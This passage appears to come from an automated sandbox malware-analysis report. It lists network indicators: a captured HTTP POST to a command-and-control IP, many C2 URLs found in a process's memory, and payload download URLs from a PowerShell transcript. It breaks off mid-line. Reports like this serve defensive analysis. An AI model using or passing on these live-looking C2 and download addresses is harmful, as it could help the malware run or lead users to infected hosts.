                Source: unknownHTTP traffic detected: POST /OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/ HTTP/1.1Referer: http://185.94.252.13/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/Content-Type: multipart/form-data; boundary=---------------------------316018655839823User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/l9mxCPCRzvrdJqd7gDg/8NeBfb/UP3O0TnX/bFLb7raYZ3UvCr/PYNusX3ERpHpdqNnga3/DDoS0Ahi
                Source: hnetcfg.exe, 00000006.00000002.530211089.0000000002A50000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/nwkpxZwyjrCeZbfcf/fAnIZcRwnf99IuspZD/VFvg1jezY7LUpm/EiahSxVLNzl8Cwm9/fvlm/j3oA7
                Source: hnetcfg.exe, 00000006.00000003.362310502.0000000002AA3000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/
                Source: hnetcfg.exe, 00000006.00000003.362310502.0000000002AA3000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/v
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/V1bfVNXmGf/
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/V1bfVNXmGf/6
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/XxXEdON5aVYXFRQitMj/oWmuuNtyx0q6einR/L2HdFwm6Bbbyl8/HG6zDRBX6Fqg1c/
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp, hnetcfg.exe, 00000006.00000002.530145861.0000000002A34000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/nwkpxZwyjrCeZbfcf/fAnIZcRwnf99IuspZD/VFvg1jezY7LUpm/EiahSxVLNzl8Cwm9/fvlm/j
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/pxUyBndrkFQg9MbC/BNGA/7r3Jr4QC8l8byshfZ/GE38Mqblnsqox/FGlnTj12jUpGlPKrKS/
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/pxUyBndrkFQg9MbC/BNGA/7r3Jr4QC8l8byshfZ/GE38Mqblnsqox/FGlnTj12jUpGlPKrKS/O
                Source: hnetcfg.exe, 00000006.00000002.530324674.0000000002AE0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.25w
                Source: hnetcfg.exe, 00000006.00000003.362310502.0000000002AA3000.00000004.00000001.sdmpString found in binary or memory: http://73.116.193.136/Fovb6wRbsEl0OBz2sIZ/NzqDzD4SZx/nQZlEmTUbvZmXJyA/DhlB12Ns70NcwOtMshF/
                Source: hnetcfg.exe, 00000006.00000003.361221585.0000000002AA1000.00000004.00000001.sdmpString found in binary or memory: http://73.116.193.136/Fovb6wRbsEl0OBz2sIZ/NzqDzD4SZx/nQZlEmTUbvZmXJyA/DhlB12Ns70NcwOtMshF/G
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65/HUU9YW2A/
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp, hnetcfg.exe, 00000006.00000003.416090071.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/HUU9YW2A/
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/HUU9YW2A/r
                Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/HUU9YW2A/ys
                Source: svchost.exe, 00000001.00000002.530257687.0000023192012000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: hnetcfg.exe, 00000006.00000003.362328646.0000000002ABC000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsup43/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/
                Source: svchost.exe, 00000001.00000002.530257687.0000023192012000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000001.00000002.530257687.0000023192012000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txt.2.drString found in binary or memory: http://qatifsport.net/t/NbQq254/
                Source: PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txt.2.drString found in binary or memory: http://rectificadoscarrion.com/wp-includes/EiQ/
                Source: PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txt.